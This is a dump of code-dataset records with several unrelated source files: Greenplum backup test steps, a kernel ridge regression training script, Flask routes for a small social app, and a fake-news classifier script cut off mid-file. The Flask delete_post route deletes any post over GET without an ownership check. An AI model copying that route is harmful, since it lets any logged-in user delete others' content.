gen_wire(d_num):\n\t\tnum[0] += 1\n\t\treturn ((num[0], direction_order[d_num]),\n\t\t (-num[0], direction_order[d_num].opposite),\n\t\t 1.0)\n\t\n\twires_between_boards = {\n\t\t(c, f, direction_order[d_num]) : [gen_wire(d_num) for _ in range(5)]\n\t\tfor c in range(2)\n\t\tfor f in range(5)\n\t\tfor d_num in range(3)\n\t}\n\t\n\twires_between_frames = {\n\t\t(c, direction_order[d_num]) : [gen_wire(d_num) for _ in range(5)]\n\t\tfor c in range(2)\n\t\tfor d_num in range(3)\n\t}\n\t\n\twires_between_cabinets = {\n\t\tdirection_order[d_num] : [gen_wire(d_num) for _ in range(5)]\n\t\tfor d_num in range(3)\n\t}\n\t\n\tflat_plan = plan.flatten_wiring_plan(wires_between_boards,\n\t wires_between_frames,\n\t wires_between_cabinets,\n\t cab.board_wire_offset)\n\t\n\t# Should have a plan with one instruction per wire\n\tassert len(flat_plan) == num[0]\n\t\n\t# Plan should be in the predicted order\n\tassert [sb for ((sb, sd), (db, dd), wl) in flat_plan] ==\\\n\t\tlist(range(1, 
num[0]+1))\n","repo_name":"SpiNNakerManchester/SpiNNer","sub_path":"tests/test_plan.py","file_name":"test_plan.py","file_ext":"py","file_size_in_byte":10550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"30462819714","text":"# coding: utf-8 \n\nimport thread\nimport os\nimport socket\nimport time\nimport filecmp\nfrom gppylib.commands.base import Command, ExecutionError, REMOTE, WorkerPool, CommandResult\nfrom gppylib.db import dbconn\nfrom gppylib.test.behave_utils.utils import run_gpcommand, getRows, validate_parse_email_file\nfrom gppylib.gparray import GpArray\nfrom gppylib.operations.unix import CheckFile\n\nmaster_data_dir = os.environ.get('MASTER_DATA_DIRECTORY')\n\ncomment_start_expr = '-- '\ncomment_expr = '-- Name: '\ncomment_data_expr_a = '-- Data: '\ncomment_data_expr_b = '-- Data for Name: '\nlen_start_comment_expr = len(comment_start_expr)\n\n@given('the user locks \"{table_name}\" in \"{lock_mode}\" using connection \"{conn}\" on \"{dbname}\"')\n@when('the user locks \"{table_name}\" in \"{lock_mode}\" using connection \"{conn}\" on \"{dbname}\"')\n@then('the user locks \"{table_name}\" in \"{lock_mode}\" using connection \"{conn}\" on \"{dbname}\"')\ndef impl(context, table_name, lock_mode, conn, dbname):\n    query = \"begin; lock table %s in %s\" % (table_name, lock_mode)\n    conn = dbconn.connect(dbconn.DbURL(dbname=dbname))\n    dbconn.execSQL(conn, query) \n    context.conn = conn\n\n@when('the user runs the query \"{query}\" in database \"{dbname}\" in a worker pool \"{poolname}\" as soon as pg_class is locked')\n@then('the user runs the query \"{query}\" in database \"{dbname}\" in a worker pool \"{poolname}\" as soon as pg_class is locked')\ndef impl(context, query, dbname, poolname):\n    pool = WorkerPool(numWorkers=1)\n    cmd = on_unlock(query,dbname)\n    pool.addCommand(cmd)\n    if not hasattr(context, 'pool'):\n        context.pool = {}\n    context.pool[poolname] = pool\n    context.cmd = cmd\n\n@when('the user runs the \"{cmd}\" in a worker pool \"{poolname}\"')\n@then('the user runs the \"{cmd}\" in a worker pool \"{poolname}\"')\ndef impl(context, cmd, poolname):\n    command = Command(name='run gpcrondump in a separate thread', cmdStr=cmd)\n    pool = WorkerPool(numWorkers=1)\n    pool.addCommand(command)\n    if not hasattr(context, 'pool'):\n        context.pool = {}\n    context.pool[poolname] = pool\n    context.cmd = cmd\n    \nclass on_unlock(Command):\n    def __init__(self, query, dbname):\n        self.dbname = dbname\n        self.query = query\n        self.result = 1\n        self.completed = False\n        self.halt = False\n        Command.__init__(self, 'on unlock', 'on unlock', ctxt=None, remoteHost=None)\n\n    def get_results(self):\n        return CommandResult(self.result, '', '', self.completed, self.halt)\n\n    def run(self):\n        while check_pg_class_lock(self.dbname) != 1:\n            pass\n        with dbconn.connect(dbconn.DbURL(dbname=self.dbname)) as conn:\n            dbconn.execSQL(conn, self.query)\n        self.result = 0\n        self.completed = True\n        self.halt = False\n\ndef check_pg_class_lock(dbname):\n    seg_count = 1\n\n    query = \"\"\"select count(*)\n               from pg_locks\n               where relation in (select oid from pg_class where relname='pg_class')\n               and locktype='relation' and mode='ExclusiveLock'\"\"\"\n    row_count = getRows(dbname, query)[0][0]\n    return row_count\n\n@given('the \"{backup_pg}\" has a lock on the pg_class table in \"{dbname}\"')\n@when('the \"{backup_pg}\" has a lock on the pg_class table in \"{dbname}\"')\n@then('the \"{backup_pg}\" has a lock on the pg_class table in \"{dbname}\"')\ndef impl(context, dbname, backup_pg):\n 
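An aside on the lock-polling step that follows: it sleeps for a fixed number of iterations and only inspects the final reading, so it always burns the full timeout even when the lock appears immediately. A minimal poll-until-true sketch with an explicit deadline; the helper name wait_for_pg_class_lock and the intervals are illustrative assumptions, not part of the original suite:

import time

def wait_for_pg_class_lock(check_fn, expected=1, timeout_s=2.0, interval_s=0.2):
    """Poll check_fn() until it returns `expected` or the deadline passes."""
    deadline = time.time() + timeout_s
    while time.time() < deadline:
        if check_fn() == expected:
            return True  # lock observed, stop early
        time.sleep(interval_s)
    return False

# Hypothetical usage mirroring the step below:
#   if not wait_for_pg_class_lock(lambda: check_pg_class_lock(dbname)):
#       raise Exception("Expected an ExclusiveLock on pg_class")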
seg_count = 1\n timeout = 2\n while timeout > 0:\n row_count = check_pg_class_lock(dbname)\n time.sleep(1)\n timeout -= 1\n if row_count != seg_count:\n raise Exception(\"Incorrect (number of) lock/locks on pg_class, expected count = %s, received count = %s\" % (seg_count, row_count))\n\n@then('the worker pool \"{poolname}\" is cleaned up')\n@when('the worker pool \"{poolname}\" is cleaned up')\ndef impl(context, poolname):\n pool = context.pool[poolname]\n if pool:\n pool.join()\n for c in pool.getCompletedItems():\n result = c.get_results()\n context.ret_code = result.rc\n context.stdout_message = result.stdout\n context.error_message = result.stderr\n pool.haltWork()\n pool.joinWorkers()\n else:\n raise Exception('Worker pool is None.Probably behave step to initialize the worker pool is missing.')\n\n@given('the user drops \"{tablename}\" in \"{dbname}\" in a worker pool \"{poolname}\"')\n@then('the user drops \"{tablename}\" in \"{dbname}\" in a worker pool \"{poolname}\"')\n@when('the user drops \"{tablename}\" in \"{dbname}\" in a worker pool \"{poolname}\"')\ndef impl(context, tablename, dbname, poolname):\n pool = WorkerPool(numWorkers=1)\n cmd = Command(name='drop a table in a worker pool', cmdStr=\"\"\"psql -c \"DROP TABLE %s\" -d %s\"\"\" % (tablename, dbname))\n pool.addCommand(cmd)\n if not hasattr(context, 'pool'):\n context.pool = {}\n context.pool[poolname] = pool\n \n\n@given('the user closes the connection \"{conn_name}\"')\n@when('the user closes the connection \"{conn_name}\"')\n@then('the user closes the connection \"{conn_name}\"')\ndef impl(context, conn_name):\n query = \"\"\"ROLLBACK;\"\"\"\n dbconn.execSQL(context.conn, query) \n context.conn.close()\n\n@given('verify that \"{backup_pg}\" has no lock on the pg_class table in \"{dbname}\"')\n@when('verify that \"{backup_pg}\" has no lock on the pg_class table in \"{dbname}\"')\n@then('verify that \"{backup_pg}\" has no lock on the pg_class table in \"{dbname}\"')\ndef impl(context, backup_pg, dbname):\n query = \"\"\"select count(*) \n from pg_locks \n where relation in (select oid from pg_class where relname='pg_class') \n and locktype='relation' and mode='ExclusiveLock'\"\"\"\n\n row_count = getRows(dbname, query)[0][0]\n if row_count != 0:\n raise Exception(\"Found a ExclusiveLock on pg_class\")\n\n@given('there is a \"{tabletype}\" table \"{table_name}\" with compression \"{compression_type}\" in \"{dbname}\" with data and {rowcount} rows')\n@when('there is a \"{tabletype}\" table \"{table_name}\" with compression \"{compression_type}\" in \"{dbname}\" with data and {rowcount} rows')\n@then('there is a \"{tabletype}\" table \"{table_name}\" with compression \"{compression_type}\" in \"{dbname}\" with data and {rowcount} rows')\ndef impl(context, tabletype, table_name, compression_type, dbname, rowcount):\n populate_regular_table_data(context, tabletype, table_name, compression_type, dbname, int(rowcount))\n\n@given('verify the metadata dump file syntax under \"{directory}\" for comments and types')\n@when('verify the metadata dump file syntax under \"{directory}\" for comments and types')\n@then('verify the metadata dump file syntax under \"{directory}\" for comments and types')\ndef impl(context, directory):\n names = [\"Name\", \"Data\", \"Data for Name\"]\n types = [\"TABLE\", \"TABLE DATA\", \"EXTERNAL TABLE\", \"ACL\", \"CONSTRAINT\", \"COMMENT\", \"PROCEDURAL LANGUAGE\", \"SCHEMA\", \"AOSTORAGEOPTS\"]\n master_dump_dir = directory if len(directory.strip()) != 0 else master_data_dir\n timestamp = 
context.backup_timestamp\n metadata_file = '%s/db_dumps/%s/gp_dump_1_1_%s.gz' % (master_dump_dir, timestamp[0:8], timestamp)\n tmp_metadata_file = '/tmp/behave_metadata_file'\n\n cmd = Command(name=\"Unzip conetnts of metadata dump file to temp file\", cmdStr='zcat %s > %s' % (metadata_file, tmp_metadata_file))\n cmd.run(validateAfter=True)\n\n try:\n with open(tmp_metadata_file, 'r') as fd:\n lines = fd.readlines() \n if len(lines) == 0:\n raise Exception('Metadata file has no data')\n for line in lines:\n if (line[:3] == comment_start_expr):\n if (line.startswith(comment_expr) or line.startswith(comment_data_expr_a) or line.startswith(comment_data_expr_b)):\n name_k, type_k, schema_k = get_comment_keys(line)\n if (name_k not in names and type_k != \"Type\" and schema_k != \"Schema\"):\n raise Exception(\"Unknown key in the comment line of the metdata_file '%s'. Please check and confirm if the key is correct\" % (metadata_file))\n name_v, type_v, schema_v = get_comment_values(line)\n if (type_v not in types):\n raise Exception(\"Value of Type in the comment line '%s' of the metadata_file '%s' does not fall under the expected list %s. Please check if the value is correct\" %(type_v, metadata_file, types))\n finally:\n if os.path.exists(tmp_metadata_file):\n os.remove(tmp_metadata_file)\n\ndef get_comment_keys(line):\n try:\n temp = line[len_start_comment_expr:]\n tokens = temp.strip().split(';')\n name = tokens[0].split(':')[0].strip()\n type = tokens[1].split(':')[0].strip()\n schema = tokens[2].split(':')[0].strip()\n except:\n return (None, None, None)\n return (name, type, schema) \n\ndef get_comment_values(line):\n try:\n temp = line[len_start_comment_expr:]\n tokens = temp.strip().split(';')\n name = tokens[0].split(':')[1].strip()\n type = tokens[1].split(':')[1].strip()\n schema = tokens[2].split(':')[1].strip()\n except:\n return (None, None, None)\n return (name, type, schema) \n\n@given('{command} should print {out_msg} to stdout {num} times')\n@when('{command} should print {out_msg} to stdout {num} times')\n@then('{command} should print {out_msg} to stdout {num} times')\ndef impl(context, command, out_msg, num):\n msg_list = context.stdout_message.split('\\n')\n msg_list = [x.strip() for x in msg_list]\n\n count = msg_list.count(out_msg)\n if count != int(num):\n raise Exception(\"Expected %s to occur %s times. 
Found %d\" % (out_msg, num, count))\n\n@given('verify that {filetype} file is generated in {dir}')\n@when('verify that {filetype} file is generated in {dir}')\n@then('verify that {filetype} file is generated in {dir}')\ndef impl(context, filetype, dir):\n if dir == 'master_data_directory':\n dir = master_data_dir\n if filetype == 'report':\n filename = '%s/gp_restore_%s.rpt' % (dir, context.backup_timestamp)\n if not os.path.isfile(filename):\n raise Exception('Report file %s is not present in master data directory' % filename)\n elif filetype == 'status':\n gparray = GpArray.initFromCatalog(dbconn.DbURL())\n if dir == 'segment_data_directory':\n primary_segs = [seg for seg in gparray.getDbList() if seg.isSegmentPrimary()]\n for seg in primary_segs:\n host = seg.getSegmentHostName()\n seg_data_dir = seg.getSegmentDataDirectory()\n cmd = Command('check status file', \"ls %s/gp_restore_status_*_%s\" % (seg_data_dir, context.backup_timestamp), ctxt=REMOTE, remoteHost=host)\n cmd.run(validateAfter=True)\n results = cmd.get_results()\n if not results.stdout.strip():\n raise Exception('Status file ending with timestamp %s is not present in segment %s data directory' % (context.backup_timestamp, host))\n else:\n count = 0\n primary_segs = [seg for seg in gparray.getDbList() if seg.isSegmentPrimary()]\n for seg in primary_segs:\n host = seg.getSegmentHostName()\n cmd = Command('check status file', \"ls %s/gp_restore_status_*_%s\" % (dir, context.backup_timestamp), ctxt=REMOTE, remoteHost=host)\n cmd.run(validateAfter=True)\n results = cmd.get_results()\n if results.stdout.strip():\n count += 1\n else:\n raise Exception('Status file not found in segment: %s' % host)\n segs = len(primary_segs)\n if count != segs:\n raise Exception('Expected %d status file but found %d' % (segs, count))\n\n@given('there are no {filetype} files in \"{dir}\"')\n@when('there are no {filetype} files in \"{dir}\"')\n@then('there are no {filetype} files in \"{dir}\"')\ndef impl(context, filetype, dir):\n if filetype == 'report':\n if dir == 'master_data_directory':\n dir = master_data_dir\n filenames = os.listdir(dir)\n for filename in filenames:\n if filename.startswith('gp_restore') and filename.endswith('.rpt'):\n filename = '%s/%s' % (dir, filename)\n os.remove(filename)\n if filetype == 'status':\n gparray = GpArray.initFromCatalog(dbconn.DbURL())\n if dir == 'segment_data_directory':\n primary_segs = [seg for seg in gparray.getDbList() if seg.isSegmentPrimary()]\n for seg in primary_segs:\n host = seg.getSegmentHostName()\n seg_data_dir = seg.getSegmentDataDirectory()\n cmd = Command('remove status file', \"rm -f %s/gp_restore_status_*\" % (seg_data_dir), ctxt=REMOTE, remoteHost=host)\n cmd.run(validateAfter=True)\n else:\n primary_segs = [seg for seg in gparray.getDbList() if seg.isSegmentPrimary()]\n for seg in primary_segs:\n host = seg.getSegmentHostName()\n cmd = Command('remove status file', \"rm -f %s/gp_restore_status_*\" % dir, ctxt=REMOTE, remoteHost=host)\n cmd.run(validateAfter=True)\n\n@given('the mail_contacts file does not exist')\n@then('the mail_contacts file does not exist')\ndef impl(context):\n if \"HOME\" in os.environ:\n home_mail_file = os.path.join(os.environ[\"HOME\"], \"mail_contacts\")\n if CheckFile(home_mail_file).run():\n os.remove(home_mail_file)\n if \"GPHOME\" in os.environ:\n mail_file = os.path.join(os.environ[\"GPHOME\"], \"bin\", \"mail_contacts\")\n if CheckFile(mail_file).run():\n os.remove(mail_file)\n\n@given('the mail_contacts file exists')\ndef impl(context):\n 
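The mail_contacts fixture below opens the file with the Python 2 file() builtin and closes it by hand. A context-manager sketch of the same logic that cannot leak the handle; the function name and the HOME/GPHOME fallback order mirror the step below and are illustrative:

import os

def write_mail_contacts(contact="example_test@gopivotal.com"):
    # Prefer $HOME/mail_contacts, fall back to $GPHOME/bin/mail_contacts.
    if "HOME" in os.environ:
        path = os.path.join(os.environ["HOME"], "mail_contacts")
    elif "GPHOME" in os.environ:
        path = os.path.join(os.environ["GPHOME"], "bin", "mail_contacts")
    else:
        raise EnvironmentError("neither HOME nor GPHOME is set")
    with open(path, "w") as f:  # closed automatically, even on error
        f.write(contact)
    return path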
context.email_contact = \"example_test@gopivotal.com\"\n    if \"HOME\" in os.environ:\n        home_mail_file = os.path.join(os.environ[\"HOME\"], \"mail_contacts\")\n        mail_contact = home_mail_file\n    elif \"GPHOME\" in os.environ:\n        mail_file = os.path.join(os.environ[\"GPHOME\"], \"bin\", \"mail_contacts\")\n        mail_contact = mail_file\n    f = file(mail_contact, 'w+')\n    f.write(context.email_contact)\n    f.close()\n\n@given('the yaml file \"{email_file_path}\" stores email details is in proper format')\ndef impl(context, email_file_path):\n    try:\n        validate_parse_email_file(context, email_file_path)\n    except Exception as e:\n        raise Exception(str(e))\n\n@given('the yaml file \"{email_file_path}\" stores email details is not in proper format')\ndef impl(context, email_file_path):\n    exception_raised = False\n    try:\n        validate_parse_email_file(context, email_file_path)\n    except Exception as e:\n        exception_raised = True\n    if exception_raised == False:\n        raise Exception(\"File is in proper format\")\n\n@then('verify that emails are sent to the given contacts with appropriate messages after backup of \"{dblist}\"')\ndef impl(context, dblist):\n    cmd_list = []\n    sending_email_list = []\n    database_list = dblist.split(',')\n    stdout = context.stdout_message\n    for line in stdout.splitlines():\n        if \"Sending mail to\" in line:\n            str = line.split(':-')[1]\n            sending_email_list.append(str.strip())\n        if \"Email command string=\" in line:\n            log_msg, delim, txt = line.partition('=')\n            cmd_list.append(txt.strip())\n    if len(sending_email_list) != len(database_list):\n        raise Exception(\"Emails are not sent properly\")\n    count = 0\n    for dbname in database_list:\n        #expected email details\n        for email in context.email_details:\n            if dbname in email['DBNAME']:\n                expected_from = email['FROM']\n                expected_sub = email['SUBJECT']\n            else:\n                expected_sub = \"Report from gpcrondump on host %s [COMPLETED]\" % socket.gethostname()\n        #original email details\n        result_cmd = cmd_list[count]\n        str = result_cmd[result_cmd.find(\"-s\")+4:]\n        result_sub = (str[:str.find('\"')]).strip()\n        if expected_sub != result_sub:\n            raise Exception(\"Subject of the sent email is not correct\")\n        if result_cmd.find(\"-- -f\") >= 0:\n            result_from = result_cmd[result_cmd.find(\"-- -f\")+6:]\n            if expected_from != result_from:\n                raise Exception(\"ef : RF\", expected_from, result_from, count)\n                #raise Exception(\"Sender of the sent email is not correct\")\n        count += 1\n\n@then('gpcrondump should print unable to send dump email notification to stdout as warning')\ndef impl(context):\n    stdout = context.stdout_message\n    found = False\n    for line in stdout.splitlines():\n        if \"Unable to send dump email notification\" in line:\n            found = True\n    if found is False:\n        raise Exception(\"'Unable to send dump email notification' exception is not raised\")\n\n@then('verify that function is backedup correctly in \"{dumpfile}\"')\ndef impl(context, dumpfile):\n    buf = \"\"\"CREATE ORDERED AGGREGATE agg_array(anyelement) (\n          SFUNC = array_append,\n          STYPE = anyarray,\n          INITCOND = '{}'\n);\"\"\"\n    if not buf in open(dumpfile).read():\n        raise Exception(\"pg_dump did not backup aggregate functions correctly.\")\n","repo_name":"vitessedata/gpdb.4.3.99.x","sub_path":"gpdb/gpMgmt/bin/gppylib/test/behave/mgmt_utils/steps/backup_mgmt_utils.py","file_name":"backup_mgmt_utils.py","file_ext":"py","file_size_in_byte":17209,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"32878700643","text":"import numpy as np\nimport joblib\nfrom time import time\nimport argparse\nimport os\n\nimport warnings\nfrom sklearn.exceptions import ConvergenceWarning\nwarnings.filterwarnings('ignore')\n\nimport sys\nsys.path.append('../../src/')\nsys.path.append('../../config/')\n\nfrom surrogate import Hymod, KRRcv\nfrom config import Hymod_inputs, KRR_hyperparams, Random_seeds\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--n_samples\", type=int, required=True, help=\"Number of training samples.\")\nparser.add_argument(\"--index\", type=int, required=False, default=-1, help=\"Index of run.\")\nargs = parser.parse_args()\nn = args.n_samples\nindex = args.index\n\nnp.random.seed(Random_seeds[\"Hymod_train\"])\n\nMODEL_DIR = '../models/'\nos.makedirs(MODEL_DIR, exist_ok=True)\n\nfstar = Hymod()\n\nxmin = Hymod_inputs[\"min\"]\nxmax = Hymod_inputs[\"max\"]\nd = xmin.shape[0]\nX = np.random.rand(n, d) @ np.diag(xmax - xmin) + np.ones((n, d)) @ np.diag(xmin)\ny = fstar.predict(X)\n\nalphas, gammas = KRR_hyperparams[n]\n\nif index >= 0:\n    MODEL_DIR = f'{MODEL_DIR}n_{n}/'\n    os.makedirs(MODEL_DIR, exist_ok=True)\n\n    alpha = alphas[index // len(gammas)]\n    gamma = gammas[index % len(gammas)]\n\n    f = KRRcv([alpha], [gamma])\n    t1 = time()\n    f.fit(X, y)\n    joblib.dump(f, f\"{MODEL_DIR}a_{alpha}_g_{gamma}.pkl\")\n\nelse:\n    f = KRRcv(alphas, gammas)\n    t1 = time()\n    f.fit(X, y)\n    joblib.dump(f, f\"{MODEL_DIR}n_{n}.pkl\") \n    alpha = f.model.best_params_['alpha']\n    gamma = f.model.best_params_['gamma']\n\n\nprint(f'n={n}: {time()-t1: .3f} seconds')\nprint(f'alpha: {alpha}')\nprint(f'gamma: {gamma}')\n\n\n","repo_name":"aufieroma12/floodgate","sub_path":"Hymod/train_krr/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"17569617303","text":"import os\nfrom pdb import post_mortem\nimport random\nfrom urllib import response\nfrom flask import abort, Blueprint, request, render_template, redirect, url_for, flash\nfrom datetime import datetime\nfrom quitter_app.auth.forms import SignUpForm\nfrom quitter_app.models import *\nfrom quitter_app.main.forms import ReactionForm, PostForm, UserForm\nfrom flask_login import login_user, logout_user, login_required, current_user\nfrom quitter_app.extensions import app, db, bcrypt\n\n\nmain = Blueprint(\"main\", __name__)\n\n##########################################\n#           MAIN Routes                  #\n##########################################\n\n@main.route('/')\ndef homepage():\n    all_posts = Post.query.all()\n    all_users = User.query.all()\n    reactions = Reaction.query.all()\n    return render_template('home.html', \n        all_posts=all_posts, all_users=all_users, reactions=reactions, datetime=datetime, random=random)\n\n@main.route('/profile/<username>')\n@login_required\ndef user_profile(username):\n    user = User.query.filter_by(username=username).first()\n    posts = Post.query.filter_by(created_by=user).all()\n    return render_template('profile.html', user=user, posts=posts, datetime=datetime, random=random)\n\n@main.route('/new_post', methods=['GET', 'POST'])\n@login_required\ndef new_post():\n    form = PostForm()\n\n    if form.validate_on_submit():\n        new_post = Post(\n            title=form.title.data,\n            audience=form.audience.data,\n            body =form.body.data,\n            photo_url=form.photo_url.data,\n            created_by=current_user,\n        )\n        db.session.add(new_post)\n        db.session.commit()\n\n        flash(f'Success! 
Your post was created successfully.')\n        return redirect(url_for('main.homepage'))\n\n\n    return render_template('new_post.html', form=form)\n\n@main.route('/post/<int:post_id>/reaction/add', methods=['GET', 'POST'])\n@login_required\ndef add_reaction(post_id):\n    post = Post.query.get(post_id)\n    form = ReactionForm(request.form)\n\n    if form.validate_on_submit():\n        new_reaction = Reaction(\n            reaction=form.reaction.data,\n            comment=form.comment.data,\n            created_by=current_user,\n            post=post\n        )\n        db.session.add(new_reaction)\n        db.session.commit()\n\n        flash(f'Success! Your reaction was created successfully.')\n        return redirect(url_for('main.homepage'))\n\n    return render_template('add_reaction.html', form=form, post=post)\n\n@main.route('/user/<int:user_id>', methods=['GET', 'POST'])\n@login_required\ndef edit_profile(user_id):\n\n    user = User.query.get(user_id)\n\n    if user !=current_user:\n        abort(403)\n    \n    form = UserForm(obj=user)\n    \n    if form.validate_on_submit():\n        form.populate_obj(user)\n        db.session.add(user)\n        db.session.commit()\n\n        flash(f'Good News! {user.username} was UPDATED successfully.')\n        return redirect(url_for('main.user_profile', username=current_user.username))\n\n    return render_template('edit_profile.html', user=user, form=form, datetime=datetime, random=random)\n\n@main.route('/post/<int:post_id>', methods=['GET', 'POST'])\n@login_required\ndef edit_post(post_id):\n    post = Post.query.get(post_id)\n    if post.created_by != current_user:\n        abort(403)\n    form = PostForm(obj=post)\n\n    if form.delete.data:\n        return redirect(url_for('main.delete_post', post_id=post.id)) \n\n    if form.validate_on_submit():\n        form.populate_obj(post)\n        db.session.add(post)\n        db.session.commit()\n\n        flash(f'Good News! Your post was UPDATED successfully.')\n        return redirect(url_for('main.homepage'))\n\n    return render_template('edit_post.html', post=post, form=form)\n\n@main.route('/post/<int:post_id>/reaction/<int:reaction_id>/edit', methods=['GET', 'POST'])\n@login_required\ndef edit_reaction(post_id, reaction_id):\n    reaction = Reaction.query.get_or_404(reaction_id)\n    post = reaction.post\n    if reaction.created_by != current_user:\n        abort(403)\n    form = ReactionForm(obj=reaction)\n\n    if form.validate_on_submit():\n        form.populate_obj(reaction)\n        db.session.add(reaction)\n        db.session.commit()\n\n        flash(f'Good News! Your reaction was UPDATED successfully.')\n        return redirect(url_for('main.homepage'))\n\n    elif request.method == 'GET':\n        form.comment.data = reaction.comment\n\n    if reaction is None:\n        flash('Reaction does not exist.')\n        return redirect(url_for('main.homepage'))\n\n    return render_template('edit_reaction.html', title='Edit Reaction', form=form, post=post, reaction=reaction)\n\n@main.route('/delete/<int:post_id>', methods=['GET', 'POST'])\n@login_required\ndef delete_post(post_id):\n    post = Post.query.get(post_id)\n\n    try:\n        db.session.delete(post)\n        db.session.commit()\n        flash('Successfully deleted {} post'.format(post))\n        return redirect(url_for('main.homepage'))\n    finally:\n        flash(' ')\n\n@main.route('/add_friend/<username>', methods=['GET', 'POST'])\n@login_required\ndef add_friend(username):\n    new_friend = User.query.filter_by(username=username).first()\n\n    if new_friend not in current_user.friend_list and new_friend is not None:\n        current_user.friend_list.append(new_friend)\n        db.session.commit()\n        flash(f'Success! {new_friend.username} has been ADDED to your friend list!') \n        return redirect(url_for('main.user_profile', username=new_friend.username)) \n    else: \n        return (f\"Aw shucks! 
{new_friend.username} is already in your friend list :)\")\n\n@main.route('/remove_friend/', methods=['POST'])\n@login_required\ndef remove_friend(username):\n user = User.query.filter_by(username=username).first()\n\n if user in current_user.friend_list:\n current_user.friend_list.remove(user)\n db.session.commit()\n flash(f'Success! {user.username} has been REMOVED from your friend list!') \n return redirect(url_for('main.user_profile', username=user.username)) \n else: \n return \"ERROR!\"","repo_name":"alexa-whitney/ACS1220-Quitter-Final-Project","sub_path":"quitter_app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7514136372","text":"__author__ = 'Noblesse Oblige'\r\nimport numpy as np\r\nfrom sklearn.ensemble import GradientBoostingClassifier\r\nfrom sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier\r\nfrom sklearn.linear_model import LogisticRegression,SGDClassifier\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.svm import LinearSVC\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.externals import joblib\r\nfrom sklearn.pipeline import make_pipeline\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.semi_supervised import LabelPropagation\r\n\r\nfrom FakeNews.baseline.fnc_kfold import *\r\nfrom FakeNews.baseline.feature_engineering import *\r\nfrom FakeNews.utils.dataset import *\r\nfrom FakeNews.utils.generate_test_splits import *\r\nfrom FakeNews.utils.score import *\r\nfrom FakeNews.utils.system import *\r\n\r\n\r\n\r\n\r\ncheck_version()\r\nparse_params()\r\n\r\n#Load the training dataset and generate folds\r\nd = DataSet(path=\"fnc_1\")\r\nfolds,hold_out = kfold_split(d,n_folds=10)\r\nfold_stances, hold_out_stances = get_stances_for_folds(d,folds,hold_out)\r\n\r\n# Load the competition dataset\r\ncompetition_dataset = DataSet(\"competition_test\")\r\nX_competition, y_competition = generate_features(competition_dataset.stances, competition_dataset, \"competition\")\r\n\r\nXs = dict()\r\nys = dict()\r\n\r\n# Load/Precompute all features now\r\nX_holdout,y_holdout = generate_features(hold_out_stances,d,\"holdout\")\r\nfor fold in fold_stances:\r\n Xs[fold],ys[fold] = generate_features(fold_stances[fold],d,str(fold))\r\n\r\n\r\n#Deciding which ML\r\n#\r\n# en=ExtraTreesClassifier(n_estimators=200,bootstrap=True,oob_score=True,n_jobs = -1, random_state=14128)\r\n# rf=RandomForestClassifier(n_estimators=200,random_state=None,n_jobs = -1,bootstrap=True,oob_score=True)\r\n# kn1=KNeighborsClassifier(n_neighbors=3,weights='distance')\r\n# kn2=KNeighborsClassifier()\r\n# nb=make_pipeline(StandardScaler(),GaussianNB())\r\n# svm1=LinearSVC(random_state=None,multi_class='crammer_singer')\r\n# svm2=LinearSVC(random_state=14128)\r\n# lr1=LogisticRegression(random_state=14128,multi_class='multinomial',solver='newton-cg')\r\n# lr2=LogisticRegression(penalty='l1')\r\n# sdg=SGDClassifier(tol=1e-4,loss='perceptron', random_state=14128,n_jobs= -1,penalty='elasticnet')\r\n# nn=MLPClassifier(activation='tanh',solver='lbfgs',learning_rate='adaptive',random_state=14128)\r\ngdb = GradientBoostingClassifier(n_estimators=200, random_state=None, verbose=True)\r\n# param=[rf,en,svm1,sdg,nb]\r\n# # for each 
system\r\n\r\n\r\n#print(\"AAAAAAAAA\",score_defaults(y_competition))\r\np=30\r\n#sub_score=0\r\n#for clf in param:\r\nclf=gdb #joblib.load('fold'+str(31)+'.pkl')\r\nif True:\r\n p=p+1\r\n # Classifier for each fold\r\n best_score = 0\r\n best_fold = None\r\n for fold in fold_stances:\r\n ids = list(range(len(folds)))\r\n del ids[fold]\r\n\r\n X_train = np.vstack(tuple([Xs[i] for i in ids]))\r\n y_train = np.hstack(tuple([ys[i] for i in ids]))\r\n#\r\n X_test = Xs[fold]\r\n y_test = ys[fold]\r\n print(\"test\",score_defaults(y_test))\r\n\r\n # Semi Automated: could not be run as system would feeze\r\n #\r\n # clf = LabelPropagation()\r\n # rng = np.random.RandomState(42)\r\n # random_unlabeled_points = rng.rand(len(y_train)) < 0.3\r\n # labels = np.copy(y_train)\r\n # labels[random_unlabeled_points] = -1\r\n # clf.fit(X_train, labels)\r\n#\r\n#\r\n#finding best params\r\n # GBCparams={'n_estimators':[100,200,300],'min_samples_split':[2,3], 'random_state':[None,14128]}\r\n # gbc = GradientBoostingClassifier()\r\n # clf = GridSearchCV(gbc, GBCparams)\r\n#\r\n# # SVMparams={'multi_class':['ovr','crammer_singer'],'fit_intercept':[True,False],'random_state':[None,14128]}\r\n# # svm=LinearSVC()\r\n# # clf = GridSearchCV(svm, SVMparams)\r\n# #\r\n# # LRparams={'penalty':['l1','l2'],'dual':[False,True], 'fit_intercept':[True,False],'class_weight':['balanced',None],'random_state':[None,14128], 'solver':['newton-cg','lbfgs','liblinear','saga'] ,'multi_class':['ovr','multinomial'], }\r\n# # lr=LogisticRegression()\r\n# # clf = GridSearchCV(lr, LRparams)\r\n# #\r\n #SDGparams={'loss':['hinge','log','modified_huber','squared_hinge','perceptron','huber','squared_loss'],'penalty':[None,'l2','l1','elasticnet'], 'fit_intercept':[True,False],'random_state':[None,14128],'learning_rate':['constant','optimal','invscaling'],'tol':[1e-3,1e-4,1e-5],'eta0':[0.1,0.5,1.0],'average':[True,False]}\r\n #sdg=SGDClassifier()\r\n #clf = GridSearchCV(sdg, SDGparams)\r\n# #\r\n# 